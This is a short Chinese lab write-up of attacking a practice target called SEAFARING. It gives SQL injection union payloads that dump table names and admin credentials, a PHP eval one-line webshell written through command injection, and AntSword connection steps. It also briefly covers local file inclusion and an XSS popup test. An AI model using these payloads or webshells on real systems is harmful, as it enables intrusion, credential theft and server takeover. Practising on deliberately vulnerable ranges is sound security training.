SEAFARING靶场渗透

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

3.三处都是回显点

4.联合查询爆出库名

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

2.上传一句话木马进去

3.将文件地址拼接到网址后进行访问

4.使用蚁剑连接

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

2.尝试输入ls有效

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php

4.复制地址用蚁剑连接

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

2.访问php文件复制地址蚁剑连连接即可

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

相关推荐
SHUIPING_YANG9 分钟前
根据用户id自动切换表查询
java·服务器·数据库
爱吃烤鸡翅的酸菜鱼21 分钟前
IDEA高效开发:Database Navigator插件安装与核心使用指南
java·开发语言·数据库·编辑器·intellij-idea·database
超奇电子26 分钟前
阿里云OSS预签名URL上传与临时凭证上传的技术对比分析
数据库·阿里云·云计算
神仙别闹38 分钟前
基于C#+SQL Server实现(Web)学生选课管理系统
前端·数据库·c#
枷锁—sha1 小时前
【DVWA系列】——CSRF——Medium详细教程
android·服务器·前端·web安全·网络安全·csrf
枷锁—sha1 小时前
跨站请求伪造漏洞(CSRF)详解
运维·服务器·前端·web安全·网络安全·csrf
m0_653031361 小时前
PostgreSQL技术大讲堂 - 第97讲:PG数据库编码和区域(locale)答疑解惑
数据库·postgresql
会编程的林俊杰1 小时前
MySQL中的锁有哪些
数据库·mysql
cts6181 小时前
Milvus分布式数据库工作职责
数据库·分布式·milvus
周胡杰1 小时前
鸿蒙加载预置数据库-关系型数据库-如何读取本地/预制数据库
数据库·华为·harmonyos·鸿蒙